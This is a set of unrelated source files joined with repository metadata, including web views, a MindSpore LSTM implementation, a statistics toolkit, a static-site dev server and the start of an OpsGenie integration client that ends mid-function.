politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/wtfs/views/report.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from morepath import redirect
from onegov.wtfs import _
from onegov.wtfs import WtfsApp
from onegov.wtfs.forms import ReportSelectionForm
from onegov.wtfs.layouts import ReportBoxesAndFormsByDeliveryLayout
from onegov.wtfs.layouts import ReportBoxesAndFormsLayout
from onegov.wtfs.layouts import ReportBoxesLayout
from onegov.wtfs.layouts import ReportFormsAllMunicipalitiesLayout
from onegov.wtfs.layouts import ReportFormsByMunicipalityLayout
from onegov.wtfs.layouts import ReportLayout
from onegov.wtfs.models import Report
from onegov.wtfs.models import ReportBoxes
from onegov.wtfs.models import ReportBoxesAndForms
from onegov.wtfs.models import ReportBoxesAndFormsByDelivery
from onegov.wtfs.models import ReportFormsAllMunicipalities
from onegov.wtfs.models import ReportFormsByMunicipality
from onegov.wtfs.security import ViewModel
@WtfsApp.form(
model=Report,
template='form.pt',
permission=ViewModel,
form=ReportSelectionForm
)
def view_select_report(self, request, form):
layout = ReportLayout(self, request)
if form.submitted(request):
return redirect(request.link(form.get_model()))
return {
'layout': layout,
'form': form,
'button_text': _("Show")
}
@WtfsApp.html(
model=ReportBoxes,
template='report_boxes.pt',
permission=ViewModel
)
def view_report_boxes(self, request):
return {'layout': ReportBoxesLayout(self, request)}
@WtfsApp.html(
model=ReportBoxesAndForms,
template='report_boxes_and_forms.pt',
permission=ViewModel
)
def view_report_boxes_and_forms(self, request):
return {'layout': ReportBoxesAndFormsLayout(self, request)}
@WtfsApp.html(
model=ReportFormsByMunicipality,
template='report_forms.pt',
permission=ViewModel
)
def view_report_forms(self, request):
return {'layout': ReportFormsByMunicipalityLayout(self, request)}
@WtfsApp.html(
model=ReportFormsAllMunicipalities,
template='report_forms_all.pt',
permission=ViewModel
)
def view_report_forms_all(self, request):
return {'layout': ReportFormsAllMunicipalitiesLayout(self, request)}
@WtfsApp.html(
model=ReportBoxesAndFormsByDelivery,
template='report_delivery.pt',
permission=ViewModel
)
def view_report_delivery(self, request):
return {'layout': ReportBoxesAndFormsByDeliveryLayout(self, request)}
| 28.634146 | 73 | 0.780664 |
6fab860de2198ce95ff7b6720e5453e4f81f5807
| 12,488 |
py
|
Python
|
research/nlp/atae_lstm/src/model_utils/rnns.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/nlp/atae_lstm/src/model_utils/rnns.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/nlp/atae_lstm/src/model_utils/rnns.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""LSTM"""
import math
import numpy as np
import mindspore
from mindspore import nn, Tensor, Parameter, ParameterTuple, ops as P
from mindspore import log as logger
from mindspore import context
from mindspore.ops.primitive import constexpr
from src.model_utils.my_utils import Reverse, ReverseSequence
from src.model_utils.rnn_cells import rnn_relu_cell, rnn_tanh_cell, lstm_cell, gru_cell
@constexpr
def _init_state(shape, dtype, is_lstm):
hx = Tensor(np.zeros(shape), dtype)
cx = Tensor(np.zeros(shape), dtype)
if is_lstm:
res = [hx, cx]
else:
res = hx
return res
class DynamicRNN(nn.Cell):
"""DynamicRNN"""
def __init__(self, mode):
super(DynamicRNN, self).__init__()
if mode == "RNN_RELU":
cell = rnn_relu_cell
elif mode == "RNN_TANH":
cell = rnn_tanh_cell
elif mode == "LSTM":
cell = lstm_cell
elif mode == "GRU":
cell = gru_cell
else:
raise ValueError("Unrecognized RNN mode: " + mode)
self.cell = cell
self.is_lstm = mode == "LSTM"
self.squeeze_0 = P.Squeeze(0)
def recurrent(self, x, h_0, w_ih, w_hh, b_ih, b_hh):
"""Fixed seq length"""
time_step = x.shape[0]
outputs = []
t = 0
h = h_0
while t < time_step:
h = self.cell(x[t], h, w_ih, w_hh, b_ih, b_hh)
if self.is_lstm:
outputs.append(h[0])
else:
outputs.append(h)
t += 1
outputs = P.Stack()(outputs)
return outputs, h
def variable_recurrent(self, x, h, seq_length, w_ih, w_hh, b_ih, b_hh):
"""variable seq length"""
time_step = x.shape[0]
h_t = h
if self.is_lstm:
hidden_size = h[0].shape[-1]
zero_output = P.ZerosLike()(h_t[0])
else:
hidden_size = h.shape[-1]
zero_output = P.ZerosLike()(h_t)
seq_length = P.Cast()(seq_length, mindspore.float16)
seq_length = P.BroadcastTo((hidden_size, -1))(seq_length)
seq_length = P.Cast()(seq_length, mindspore.int32)
seq_length = P.Transpose()(seq_length, (1, 0))
outputs = []
state_t = h_t
t = 0
while t < time_step:
h_t = self.cell(self.squeeze_0(x[t: t + 1]), state_t, w_ih, w_hh, b_ih, b_hh)
seq_cond = seq_length > t
if self.is_lstm:
state_t_0 = P.Select()(seq_cond, h_t[0], state_t[0])
state_t_1 = P.Select()(seq_cond, h_t[1], state_t[1])
output = P.Select()(seq_cond, h_t[0], zero_output)
state_t = (state_t_0, state_t_1)
else:
state_t = P.Select()(seq_cond, h_t, state_t)
output = P.Select()(seq_cond, h_t, zero_output)
outputs.append(output)
t += 1
outputs = P.Stack()(outputs)
return outputs, state_t
def construct(self, x, h, seq_length, w_ih, w_hh, b_ih, b_hh):
"""
variable_recurrent
"""
return self.variable_recurrent(x, h, seq_length, w_ih, w_hh, b_ih, b_hh)
class RNNBase(nn.Cell):
"""RNN Base"""
def __init__(self, mode, input_size, hidden_size, num_layers=1,
has_bias=True, batch_first=False, dropout=0, bidirectional=False):
super(RNNBase, self).__init__()
if not 0 <= dropout <= 1:
raise ValueError("dropout should be a number in range [0, 1] "
"representing the probability of an element being "
"zeroed")
if dropout > 0 and num_layers == 1:
logger.warning("dropout option adds dropout after all but last "
"recurrent layer, so non-zero dropout expects "
"num_layers greater than 1, but got dropout={} and "
"num_layers={}".format(dropout, num_layers))
if mode == "LSTM":
gate_size = 4 * hidden_size
elif mode == "GRU":
gate_size = 3 * hidden_size
elif mode == "RNN_TANH":
gate_size = hidden_size
elif mode == "RNN_RELU":
gate_size = hidden_size
else:
raise ValueError("Unrecognized RNN mode: " + mode)
self.is_ascend = context.get_context("device_target") == "Ascend"
if self.is_ascend:
self.reverse = P.ReverseV2([0])
self.reverse_sequence = P.ReverseSequence(0, 1)
else:
self.reverse = Reverse(0)
self.reverse_sequence = ReverseSequence(0, 1)
self.hidden_size = hidden_size
self.batch_first = batch_first
self.num_layers = num_layers
self.dropout = dropout
self.dropout_op = nn.Dropout(float(1 - dropout))
self.bidirectional = bidirectional
self.has_bias = has_bias
self.rnn = DynamicRNN(mode)
num_directions = 2 if bidirectional else 1
self.is_lstm = mode == "LSTM"
self.w_ih_list = []
self.w_hh_list = []
self.b_ih_list = []
self.b_hh_list = []
stdv = 1 / math.sqrt(self.hidden_size)
for layer in range(num_layers):
for direction in range(num_directions):
layer_input_size = input_size if layer == 0 else hidden_size * num_directions
suffix = '_reverse' if direction == 1 else ''
init_w_ih = Tensor(np.random.uniform(-stdv, stdv, (gate_size, layer_input_size)).astype(np.float32))
init_w_hh = Tensor(np.random.uniform(-stdv, stdv, (gate_size, hidden_size)).astype(np.float32))
self.w_ih_list.append(Parameter(init_w_ih, name='weight_ih_l{}{}'.format(layer, suffix)))
self.w_hh_list.append(Parameter(init_w_hh, name='weight_hh_l{}{}'.format(layer, suffix)))
if has_bias:
init_b_ih = Tensor(np.random.uniform(-stdv, stdv, (gate_size)).astype(np.float32))
init_b_hh = Tensor(np.random.uniform(-stdv, stdv, (gate_size)).astype(np.float32))
self.b_ih_list.append(Parameter(init_b_ih, name='bias_ih_l{}{}'.format(layer, suffix)))
self.b_hh_list.append(Parameter(init_b_hh, name='bias_hh_l{}{}'.format(layer, suffix)))
self.w_ih_list = ParameterTuple(self.w_ih_list)
self.w_hh_list = ParameterTuple(self.w_hh_list)
self.b_ih_list = ParameterTuple(self.b_ih_list)
self.b_hh_list = ParameterTuple(self.b_hh_list)
def _stacked_bi_dynamic_rnn(self, x, h, seq_length):
"""stacked bidirectional dynamic_rnn"""
pre_layer = x
h_n = ()
c_n = ()
output = 0
for i in range(self.num_layers):
offset = i * 2
if self.has_bias:
w_f_ih, w_f_hh = self.w_ih_list[offset], self.w_hh_list[offset]
b_f_ih, b_f_hh = self.b_ih_list[offset], self.b_hh_list[offset]
w_b_ih, w_b_hh = self.w_ih_list[offset + 1], self.w_hh_list[offset + 1]
b_b_ih, b_b_hh = self.b_ih_list[offset + 1], self.b_hh_list[offset + 1]
else:
w_f_ih, w_f_hh = self.w_ih_list[offset], self.w_hh_list[offset]
w_b_ih, w_b_hh = self.w_ih_list[offset + 1], self.w_hh_list[offset + 1]
b_f_ih, b_f_hh, b_b_ih, b_b_hh = None, None, None, None
if self.is_lstm:
h_f_i = (h[0][offset], h[1][offset])
h_b_i = (h[0][offset + 1], h[1][offset + 1])
else:
h_f_i = h[offset]
h_b_i = h[offset + 1]
if seq_length is None:
x_b = self.reverse(pre_layer)
else:
x_b = self.reverse_sequence(pre_layer, seq_length)
output_f, h_t_f = self.rnn(pre_layer, h_f_i, seq_length, w_f_ih, w_f_hh, b_f_ih, b_f_hh)
output_b, h_t_b = self.rnn(x_b, h_b_i, seq_length, w_b_ih, w_b_hh, b_b_ih, b_b_hh)
if seq_length is None:
output_b = self.reverse(output_b)
else:
output_b = self.reverse_sequence(output_b, seq_length)
output = P.Concat(2)((output_f, output_b))
pre_layer = self.dropout_op(output) if (self.dropout != 0 and i < self.num_layers - 1) else output
if self.is_lstm:
h_n += (h_t_f[0], h_t_b[0],)
c_n += (h_t_f[1], h_t_b[1],)
else:
h_n += (h_t_f, h_t_b,)
if self.is_lstm:
h_n = P.Concat(0)(h_n)
c_n = P.Concat(0)(c_n)
h_n = h_n.view(h[0].shape)
c_n = c_n.view(h[1].shape)
res = (h_n.view(h[0].shape), c_n.view(h[1].shape))
else:
h_n = P.Concat(0)(h_n)
res = h_n.view(h.shape)
return output, res
def _stacked_dynamic_rnn(self, x, h, seq_length):
"""stacked mutil_layer dynamic_rnn"""
pre_layer = x
h_n = ()
c_n = ()
output = 0
for i in range(self.num_layers):
if self.has_bias:
w_ih, w_hh, b_ih, b_hh = self.w_ih_list[i], self.w_hh_list[i], self.b_ih_list[i], self.b_hh_list[i]
else:
w_ih, w_hh = self.w_ih_list[i], self.w_hh_list[i]
b_ih, b_hh = None, None
if self.is_lstm:
h_i = (h[0][i], h[1][i])
else:
h_i = h[i]
output, h_t = self.rnn(pre_layer, h_i, seq_length, w_ih, w_hh, b_ih, b_hh)
pre_layer = self.dropout_op(output) if (self.dropout != 0 and i < self.num_layers - 1) else output
if self.is_lstm:
h_n += (h_t[0],)
c_n += (h_t[1],)
else:
h_n += (h_t,)
if self.is_lstm:
h_n = P.Concat(0)(h_n)
c_n = P.Concat(0)(c_n)
h_n = h_n.view(h[0].shape)
c_n = c_n.view(h[1].shape)
res = (h_n.view(h[0].shape), c_n.view(h[1].shape))
else:
h_n = P.Concat(0)(h_n)
res = h_n.view(h.shape)
return output, res
def construct(self, x, h=None, seq_length=None):
"""construct"""
max_batch_size = x.shape[0] if self.batch_first else x.shape[1]
num_directions = 2 if self.bidirectional else 1
if h is None:
h = _init_state((self.num_layers * num_directions, max_batch_size, self.hidden_size), x.dtype, self.is_lstm)
if self.batch_first:
x = P.Transpose()(x, (1, 0, 2))
if self.bidirectional:
x, h = self._stacked_bi_dynamic_rnn(x, h, seq_length)
else:
x, h = self._stacked_dynamic_rnn(x, h, seq_length)
if self.batch_first:
x = P.Transpose()(x, (1, 0, 2))
return x, h
class RNN(RNNBase):
"""RNN"""
def __init__(self, *args, **kwargs):
if 'nonlinearity' in kwargs:
if kwargs['nonlinearity'] == 'tanh':
mode = 'RNN_TANH'
elif kwargs['nonlinearity'] == 'relu':
mode = 'RNN_RELU'
else:
raise ValueError("Unknown nonlinearity '{}'".format(
kwargs['nonlinearity']))
del kwargs['nonlinearity']
else:
mode = 'RNN_TANH'
super(RNN, self).__init__(mode, *args, **kwargs)
class GRU(RNNBase):
"""GRU"""
def __init__(self, *args, **kwargs):
mode = 'GRU'
super(GRU, self).__init__(mode, *args, **kwargs)
class LSTM(RNNBase):
"""LSTM"""
def __init__(self, *args, **kwargs):
mode = 'LSTM'
super(LSTM, self).__init__(mode, *args, **kwargs)
self.support_non_tensor_inputs = True
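# Illustrative usage sketch; shapes and hyper-parameter values here are assumptions,
# not values used by the project. With batch_first=False, x is (seq_len, batch,
# input_size) and seq_length holds each sample's valid length:
#   net = LSTM(input_size=10, hidden_size=16, num_layers=1, bidirectional=False)
#   x = Tensor(np.ones((5, 3, 10), np.float32))
#   lengths = Tensor(np.array([5, 3, 4], np.int32))
#   output, (hn, cn) = net(x, seq_length=lengths)   # output: (5, 3, 16); hn, cn: (1, 3, 16)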
| 39.644444 | 120 | 0.556054 |
9673d6b6f3e228139e448279a49f0668cd2fba33
| 4,251 |
py
|
Python
|
Util/DataToolkit.py
|
leoatchina/MachineLearning
|
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
|
[
"MIT"
] | 1,107 |
2016-09-21T02:18:36.000Z
|
2022-03-29T02:52:12.000Z
|
Util/DataToolkit.py
|
leoatchina/MachineLearning
|
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
|
[
"MIT"
] | 18 |
2016-12-22T10:24:47.000Z
|
2022-03-11T23:18:43.000Z
|
Util/DataToolkit.py
|
leoatchina/MachineLearning
|
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
|
[
"MIT"
] | 776 |
2016-12-21T12:08:08.000Z
|
2022-03-21T06:12:08.000Z
|
import numpy as np
import scipy.stats as stats
import matplotlib.pyplot as plt
# noinspection PyTypeChecker
class DataToolkit:
def __init__(self, data):
self._data = np.asarray(data)
self._sorted_data = np.sort(self._data)
self._n = len(self._data)
self._mean = self._variance = self._std = None
self._moments = []
self._q1 = self._q3 = None
def get_moment(self, k):
if len(self._moments) < k:
self._moments += [None] * (k - len(self._moments))
if self._moments[k-1] is None:
self._moments[k-1] = np.sum((self._data - self.mean) ** k) / self._n
return self._moments[k-1]
    def get_mp(self, p):
        # Sample p-quantile m_p: for non-integer n*p take the next order statistic;
        # for integer n*p average the two adjacent order statistics.
        _np = self._n * p
        int_np = int(_np)
        if _np % 1:  # n*p is not an integer
            return self._sorted_data[int_np]
        return 0.5 * (self._sorted_data[int_np - 1] + self._sorted_data[int_np])
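    # Worked example: with n = 30, get_mp(0.25) has n*p = 7.5 (non-integer), so
    # q1 = sorted_data[7]; with n = 8, get_mp(0.25) has n*p = 2 (integer), so
    # q1 = 0.5 * (sorted_data[1] + sorted_data[2]).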
@property
def min(self):
return self._sorted_data[0]
@property
def max(self):
return self._sorted_data[-1]
@property
def mean(self):
if self._mean is None:
self._mean = self._data.mean()
return self._mean
@property
def variance(self):
if self._variance is None:
self._variance = np.sum((self._data - self.mean) ** 2) / (self._n - 1)
return self._variance
@property
def std(self):
if self._std is None:
self._std = (np.sum((self._data - self.mean) ** 2) / (self._n - 1)) ** 0.5
return self._std
@property
def g1(self):
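        # Sample skewness (adjusted Fisher-Pearson estimator G1).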
n, moment3 = self._n, self.get_moment(3)
return n ** 2 * moment3 / ((n - 1) * (n - 2) * self.std ** 3)
@property
def g2(self):
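        # Sample excess kurtosis (bias-adjusted estimator G2).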
n, moment4 = self._n, self.get_moment(4)
return n**2*(n+1)*moment4 / ((n-1)*(n-2)*(n-3)*self.std**4) - 3*(n-1)**2/((n-2)*(n-3))
@property
    def med(self):
        n, hn = self._n, int(self._n * 0.5)
        if n & 1:  # odd n: the middle order statistic sits at 0-based index hn
            return self._sorted_data[hn]
        return 0.5 * (self._sorted_data[hn - 1] + self._sorted_data[hn])
@property
def q1(self):
if self._q1 is None:
self._q1 = self.get_mp(0.25)
return self._q1
@property
def q3(self):
if self._q3 is None:
self._q3 = self.get_mp(0.75)
return self._q3
@property
def r(self):
return self._sorted_data[-1] - self._sorted_data[0]
@property
def r1(self):
return self.q3 - self.q1
@property
def trimean(self):
return 0.25 * (self.q1 + self.q3) + 0.5 * self.med
@property
def loval(self):
return self.q1 - 1.5 * self.r1
@property
def hival(self):
return self.q3 + 1.5 * self.r1
def draw_histogram(self, bin_size=10):
bins = np.arange(self._sorted_data[0]-self.r1, self._sorted_data[-1]+self.r1, bin_size)
plt.hist(self._data, bins=bins, alpha=0.5)
plt.title("Histogram (bin_size: {})".format(bin_size))
plt.show()
def qq_plot(self):
stats.probplot(self._data, dist="norm", plot=plt)
plt.show()
def box_plot(self):
plt.figure()
plt.boxplot(self._data, vert=False, showmeans=True)
plt.show()
if __name__ == '__main__':
toolkit = DataToolkit([
53, 70.2, 84.3, 55.3, 78.5, 63.5, 71.4, 53.4, 82.5, 67.3, 69.5, 73, 55.7, 85.8, 95.4, 51.1, 74.4,
54.1, 77.8, 52.4, 69.1, 53.5, 64.3, 82.7, 55.7, 70.5, 87.5, 50.7, 72.3, 59.5
])
print("mean : ", toolkit.mean)
print("variance : ", toolkit.variance)
print("g1 : ", toolkit.g1)
print("g2 : ", toolkit.g2)
print("med : ", toolkit.med)
print("r : ", toolkit.r)
print("q3 : ", toolkit.q3)
print("q1 : ", toolkit.q1)
print("r1 : ", toolkit.r1)
print("trimean : ", toolkit.trimean)
print("hival : ", toolkit.hival)
print("loval : ", toolkit.loval)
print("min : ", toolkit.min)
print("max : ", toolkit.max)
toolkit.draw_histogram()
toolkit.qq_plot()
toolkit.box_plot()
| 29.93662 | 106 | 0.531169 |
96b7cab8806014b3e3487abbbcbfc345d5493c03
| 1,147 |
py
|
Python
|
etc/db/producer.py
|
huberthoegl/tsgrain
|
405d0ba8b98c2afa950d27294e55cd1e07506db4
|
[
"Apache-2.0"
] | 1 |
2021-06-15T08:59:02.000Z
|
2021-06-15T08:59:02.000Z
|
etc/db/producer.py
|
huberthoegl/tsgrain
|
405d0ba8b98c2afa950d27294e55cd1e07506db4
|
[
"Apache-2.0"
] | null | null | null |
etc/db/producer.py
|
huberthoegl/tsgrain
|
405d0ba8b98c2afa950d27294e55cd1e07506db4
|
[
"Apache-2.0"
] | null | null | null |
# tinydb.readthedocs.io/en/latest/getting-started.html
'''
cat db.json | jq
or
cat db.json | python -m json.tool
Pretty-to-compact conversion:
cat db.json.pretty | jq -c
'''
import os, time
from tinydb import TinyDB, Query
if os.path.exists('dbtest.json'):
os.unlink('dbtest.json')
db = TinyDB('dbtest.json')
docid = db.insert({'type': 'startcnt', 'val': 0}) # insert document
docid = db.insert({'type': 'mandelay', 'val': 5})
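# An illustrative lookup with Query (matches the document inserted above):
#   q = Query()
#   db.search(q.type == 'mandelay')   # -> [{'type': 'mandelay', 'val': 5}]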
for item in db:
print("0>", item)
ablaeufe = db.table('Ablaufliste', cache_size=0) # disable cache
n = 0
duration = 20
# while n < 20:
while True:
s = input("{}> ".format(n))
doc_id = ablaeufe.insert({'start': '20-05-11T22:00',
'duration': duration,
'courts': '*******',
'days': '1'})
# cycle: no, 12h, d, ...
duration += 5
n += 1
'''
r = db.all()
print("all>", r)
for i, item in enumerate(db):
print(i, "->", item)
print("%%>", ablaeufe.all())
for item in ablaeufe:
print("=>", item)
'''
# db.truncate()  # delete everything
# print(db.all())
| 18.206349 | 68 | 0.53531 |
73bea79b74ece13a4dbcd8f6b3f401bd79555577
| 2,681 |
py
|
Python
|
txt2xml.py
|
ligang945/pyMisc
|
3107c80f7f53ffc797b289ec73d1ef4db80f0b63
|
[
"MIT"
] | null | null | null |
txt2xml.py
|
ligang945/pyMisc
|
3107c80f7f53ffc797b289ec73d1ef4db80f0b63
|
[
"MIT"
] | null | null | null |
txt2xml.py
|
ligang945/pyMisc
|
3107c80f7f53ffc797b289ec73d1ef4db80f0b63
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
txt_dir = '/home/TestData/DPI_DATA/guangzhou_LTE/DPI_test_data/2'
xml_dir = '/home/ligang/xml'
xml_template = '/home/test_template.xml'
exclude = ['pcapstc.txt', 'badfile.txt']
#------------------------------------------------------------------------------------------
import os
#find all txt files
txt_files = []
if not os.path.exists(txt_dir):
    print('ERROR: %s does not exist!' % txt_dir)
exit()
for file in os.listdir(txt_dir):
full_name = os.path.join(txt_dir, file)
if os.path.isfile(full_name) and file.split('.')[-1] == 'txt' and file not in exclude:
txt_files.append(full_name)
txt_files.sort()
print('INFO: find %d txt files in %s' % (len(txt_files), txt_dir))
#read all txt files
all_data = {}
for txt in txt_files:
try:
with open(txt) as f:
lines = f.readlines()[4:]
all_data.setdefault(txt, lines)
except:
print('ERROR: read %s fail' % txt)
continue
#generate xml files
#it's hard to parse as xml file because of gb2312 and hanzi
if not os.path.exists(xml_dir):
os.mkdir(xml_dir)
with open(xml_template) as template:
template_content = template.read()
for key in all_data:
file = os.path.split(key)[-1]
short_name = file.split('.')[0].split('_')
service_type = short_name[0]
short_name.remove(service_type)
lines = all_data[key]
print('%s' % file)
for i in range(0, len(lines)):
try:
words = lines[i].split()
xml_file_name = service_type + '_' + words[3] + '_' + '_'.join(short_name) + '_' + str(i+1) + '.xml'
xml_file_fullname = os.path.join(xml_dir, xml_file_name)
with open(xml_file_fullname, 'w') as xml_file:
template_content_copy = template_content
template_content_copy = template_content_copy.replace('template_datasource', file.split('.')[0])
template_content_copy = template_content_copy.replace('template_sgsndataip', words[0])
template_content_copy = template_content_copy.replace('template_ggsndataip', words[1])
template_content_copy = template_content_copy.replace('template_srcip', words[2])
template_content_copy = template_content_copy.replace('template_dstip', words[3])
template_content_copy = template_content_copy.replace('template_val', words[6]+','+words[7]+','+words[8]+','+words[9])
xml_file.write(template_content_copy)
print(' %s' % xml_file_name)
except:
print('ERROR: %s format error' % file)
break
print('INFO: finish generate xml files in %s' % xml_dir)
| 38.3 | 134 | 0.616188 |
73efdfd63c8f43ce97aa52580cb741308de9a835
| 3,263 |
py
|
Python
|
logya/server.py
|
yaph/logya
|
9647f58a0b8653b56ad64332e235a76cab3acda9
|
[
"MIT"
] | 12 |
2015-03-04T03:23:56.000Z
|
2020-11-17T08:09:17.000Z
|
logya/server.py
|
elaOnMars/logya
|
a9f256ac8840e21b348ac842b35683224e25b613
|
[
"MIT"
] | 78 |
2015-01-05T11:40:41.000Z
|
2022-01-23T21:05:39.000Z
|
logya/server.py
|
elaOnMars/logya
|
a9f256ac8840e21b348ac842b35683224e25b613
|
[
"MIT"
] | 6 |
2015-04-20T06:58:42.000Z
|
2022-01-31T00:36:29.000Z
|
# -*- coding: utf-8 -*-
import http.server
import socketserver
from shutil import copyfile
from urllib.parse import unquote, urlparse
from logya.core import Logya
from logya.content import read, write_collection, write_page
from logya.template import env
class HTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
"""SimpleHTTPRequestHandler based class to return resources."""
L: Logya
def __init__(self, *args):
super(HTTPRequestHandler, self).__init__(*args, directory=self.L.paths.public.as_posix())
def do_GET(self):
update_resource(self.path, self.L)
super(HTTPRequestHandler, self).do_GET()
def update_page(url: str, L: Logya):
"""Update content or collection page."""
if content := L.doc_index.get(url):
path_rel = content['path'].relative_to(L.paths.content)
content['doc'] = read(content['path'], path_rel, L.markdown_extensions)
if L.collections:
L.update_collections(content['doc'])
# Always write doc because of possible template changes.
write_page(L.paths.public, content['doc'])
L.info(f'Refreshed doc: {url}')
return True
if content := L.collection_index.get(url):
write_collection(L.paths.public, content)
L.info(f'Refreshed collection: {url}')
return True
def update_resource(path: str, L: Logya) -> None:
"""Update resource corresponding to given url.
Resources that exist in the `static` directory are updated if they are newer than the destination file.
For other HTML resources the whole `L.doc_index` is updated and the destination is newly written."""
# Use only the actual path and ignore possible query params (see issue #3).
url = unquote(urlparse(path).path)
url_rel = url.lstrip('/')
# If a static file is requested update it and return.
src_static = L.paths.static.joinpath(url_rel)
if src_static.is_file():
dst_static = L.paths.public.joinpath(url_rel)
dst_static.parent.mkdir(exist_ok=True)
if not dst_static.exists() or src_static.stat().st_mtime > dst_static.stat().st_mtime:
L.info(f'Update static resource: {dst_static}')
copyfile(src_static, dst_static)
return
# Update content or collection existing in respective index.
if update_page(url, L):
return
# Rebuild indexes for other HTML file requests and try again to update page in case of new content.
if url.endswith(('/', '.html', '.htm')):
L.info(f'Rebuild site for request URL: {url}')
L.build()
if not update_page(url, L):
L.info(f'URL not found: {url}')
def serve(dir_site: str, verbose: bool, host: str, port: int, **kwargs) -> None:
L = Logya(dir_site=dir_site, verbose=verbose)
L.build()
# Make Logya object accessible to server.
HTTPRequestHandler.L = L
# Make sure absolute links work.
base_url = f'http://{host}:{port}'
env.globals['base_url'] = base_url
# Avoid "OSError: [Errno 98] Address already in use"
socketserver.TCPServer.allow_reuse_address = True
with socketserver.TCPServer((host, port), HTTPRequestHandler) as httpd:
print(f'Serving on {base_url}')
httpd.serve_forever()
| 35.857143 | 107 | 0.676984 |
f7658db9067c802c7cce5e6ac067db9ebb8fdff3
| 1,460 |
py
|
Python
|
forge/lib/shapefile_utils.py
|
Pandinosaurus/3d-forge
|
d631e14a9351911c3e5612c73c1608d97ed547d2
|
[
"BSD-3-Clause"
] | 31 |
2015-07-13T15:36:50.000Z
|
2022-02-07T21:37:51.000Z
|
forge/lib/shapefile_utils.py
|
Pandinosaurus/3d-forge
|
d631e14a9351911c3e5612c73c1608d97ed547d2
|
[
"BSD-3-Clause"
] | 109 |
2015-04-24T10:03:24.000Z
|
2019-04-12T13:34:01.000Z
|
forge/lib/shapefile_utils.py
|
Pandinosaurus/3d-forge
|
d631e14a9351911c3e5612c73c1608d97ed547d2
|
[
"BSD-3-Clause"
] | 16 |
2015-10-03T06:03:22.000Z
|
2022-03-31T08:24:37.000Z
|
# -*- coding: utf-8 -*-
import re
from osgeo import ogr
class ShpToGDALFeatures(object):
def __init__(self, shpFilePath=None):
if shpFilePath is None:
raise Exception('No shapefile path provided')
if re.search(r'(\.shp)$', shpFilePath) is None:
raise TypeError(
'Only shapefiles are supported. Provided path %s' % shpFilePath
)
self.shpFilePath = shpFilePath
self.drvName = 'ESRI Shapefile'
self.drv = ogr.GetDriverByName(self.drvName)
# Returns a list of GDAL Features
def __read__(self):
        dataSource = self._getDatasource()
        layer = dataSource.GetLayer()
features = [feature for feature in layer]
if len(features) == 0:
return features
# raise Exception('Empty shapefile')
geometryType = features[0].GetGeometryRef().GetGeometryName()
if geometryType != 'POLYGON':
raise TypeError('Unsupported input geometry type: %s' % geometryType)
return features
def getFeatures(self):
dataSource = self._getDatasource()
layer = dataSource.GetLayer()
for feature in layer:
yield feature
def _getDatasource(self):
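        # open the shapefile read-only (the second argument, 0, selects read-only mode)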
dataSource = self.drv.Open(self.shpFilePath, 0)
if dataSource is None:
raise IOError('Could not open %s' % self.shpFilePath)
return dataSource
| 31.73913 | 81 | 0.615068 |
e3c400832f0c5110a650b72648714c8b2456ef15
| 44,052 |
py
|
Python
|
Packs/OpsGenie/Integrations/OpsGenieV3/OpsGenieV3.py
|
PAM360/content
|
928aac9c586c6e593b2a452c402a37cb5df28dac
|
[
"MIT"
] | null | null | null |
Packs/OpsGenie/Integrations/OpsGenieV3/OpsGenieV3.py
|
PAM360/content
|
928aac9c586c6e593b2a452c402a37cb5df28dac
|
[
"MIT"
] | 2 |
2021-12-26T07:34:37.000Z
|
2021-12-26T07:49:34.000Z
|
Packs/OpsGenie/Integrations/OpsGenieV3/OpsGenieV3.py
|
PAM360/content
|
928aac9c586c6e593b2a452c402a37cb5df28dac
|
[
"MIT"
] | null | null | null |
from requests import Response
import demistomock as demisto
from typing import Callable, Tuple
from CommonServerPython import * # noqa # pylint: disable=unused-wildcard-import
from CommonServerUserPython import * # noqa
# Disable insecure warnings
DEFAULT_POLL_INTERVAL = 5
requests.packages.urllib3.disable_warnings() # pylint: disable=no-member
''' CONSTANTS '''
DEFAULT_POLL_TIMEOUT = 60
INTEGRATION_NAME = 'Opsgenie'
ALERTS_SUFFIX = "alerts"
REQUESTS_SUFFIX = "requests"
SCHEDULE_SUFFIX = "schedules"
INCIDENTS_SUFFIX = "incidents"
ESCALATION_SUFFIX = "escalations"
TEAMS_SUFFIX = "teams"
DATE_FORMAT = "%Y-%m-%dT%H:%M:%SZ"
INCIDENT_TYPE = 'Incidents'
ALERT_TYPE = 'Alerts'
ALL_TYPE = 'All'
''' CLIENT CLASS '''
class Client(BaseClient):
"""
OpsGenieV3 Client
"""
def get_request(self, args: dict) -> Response:
url_suffix = "/v1" if args.get('request_type') == INCIDENTS_SUFFIX else "/v2"
return self._http_request(
method='GET',
url_suffix=f"{url_suffix}/{args.get('request_type')}/{REQUESTS_SUFFIX}/"
f"{args.get('request_id')}",
ok_codes=(404, 200),
resp_type='response')
def get_paged(self, args: dict):
data = self._http_request(
method='GET',
full_url=args.get('paging')
)
return data
@staticmethod
def responders_to_json(responders: List, responder_key: str, one_is_dict: bool = False) \
